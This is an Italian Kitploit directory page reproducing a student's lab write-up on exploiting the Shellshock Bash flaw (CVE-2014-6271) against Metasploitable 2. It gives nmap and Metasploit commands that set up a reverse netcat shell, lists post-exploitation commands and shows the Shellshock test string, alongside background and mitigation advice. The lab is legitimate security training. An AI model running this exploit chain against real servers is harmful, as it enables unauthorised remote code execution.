Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — # Laboratorio didattico che dimostra lo sfruttamento di Shellshock (CVE-2014-6271) tramite Metasploit contro Metasploitable 2, includendo scansione, sfruttamento, reverse shell e strategie di mitigazione. | Kitploit
Strumenti/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

# Laboratorio didattico che dimostra lo sfruttamento di Shellshock (CVE-2014-6271) tramite Metasploit contro Metasploitable 2, includendo scansione, sfruttamento, reverse shell e strategie di mitigazione.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🐚 Shellshock (CVE-2014-6271) – Sfruttamento e Analisi

📌 Panoramica

Questo è il compito pratico per Vulnerability Assessment and Penetration Testing – II, incentrato sullo sfruttamento e l'analisi della vulnerabilità Shellshock (CVE-2014-6271).
Condotto in un ambiente di laboratorio controllato utilizzando Metasploitable 2 (target) e Kali Linux (attaccante).


🛠 Strumenti Utilizzati

  • 💻 Kali Linux – Macchina attaccante
  • 🖥 Metasploitable 2 – Target vulnerabile
  • 🔍 Nmap – Scansione e rilevamento servizi
  • 🎯 Metasploit Framework – Sfruttamento

🔍 Riepilogo Vulnerabilità

  • Tipo: Remote Code Execution (RCE)
  • Componente Affetto: GNU Bash (versioni 1.14–4.3)
  • Impatto: Esecuzione di comandi arbitrari tramite variabili d'ambiente appositamente predisposte
  • Punteggio CVSS: 10.0 (Critico)
  • Vettore di Sfruttamento: Spesso tramite intestazioni HTTP verso script CGI

⚡ Fasi di Laboratorio

1️⃣ Scansiona il Target

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Avvia Metasploit msfconsole

3️⃣ Carica il Modulo di Exploit use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Configura l'Exploit

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Esegui l'Exploit exploit

📸 Dimostrazione Include

root@kitploit:~
📡 Risultati scansione Nmap

⚙️ Configurazione Metasploit

🔄 Output del reverse shell

🛠 Comandi post-exploitation:

whoami
uname -a
ifconfig

📖 Background Teorico Cos'è Shellshock?

Shellshock è una vulnerabilità nella shell GNU Bash che consente agli attaccanti di eseguire comandi arbitrari iniettandoli in variabili d'ambiente. Scoperta a settembre 2014 e assegnata come CVE-2014-6271, colpisce Bash v1.14 fino a v4.3. Come Funziona

Bash elabora erroneamente le definizioni di funzione nelle variabili d'ambiente ed esegue comandi extra dopo il corpo della funzione. Nei server web che utilizzano script CGI, le intestazioni HTTP diventano variabili d'ambiente, creando un percorso di attacco facile.

Esempio:

env x='() { :;}; echo vulnerable' bash -c "echo test"

Se vulnerabile, stampa vulnerable. Impatto

root@kitploit:~
Esecuzione Remota Completa di Codice (RCE) senza autenticazione

Sfruttabile tramite semplici richieste HTTP

Utilizzato in botnet, worm, attacchi mirati

Ha colpito milioni di server, router e dispositivi IoT

Exploit Reali

root@kitploit:~
Server Yahoo – Malware tramite script CGI

Botnet Wopbot – Sfruttamento automatizzato

QNAP NAS – Accesso remoto alla shell e malware

Worm Auto-Replicanti – Diffusione verso nuovi host vulnerabili

🛡 Prevenzione e Mitigazione

root@kitploit:~
🔄 Aggiornare Bash immediatamente

🚫 Disattivare script CGI inutilizzati

🔥 Usare firewall per bloccare traffico non necessario

🛡 Implementare Web Application Firewall (WAF)

📜 Monitorare i log delle richieste HTTP

👤 Applicare il principio del minimo privilegio

⚠️ Disclaimer

Questo progetto è a solo scopo educativo. Tutti i test sono stati condotti in un ambiente di laboratorio controllato. ❌ Non utilizzare queste tecniche su sistemi senza autorizzazione.

👨‍💻 Autore: Janith Madhusankha 🎓 Corso: BICT (Hons) in Network & Security 🏫 Istituzione: South Eastern University of Sri Lanka

Scarica lo strumento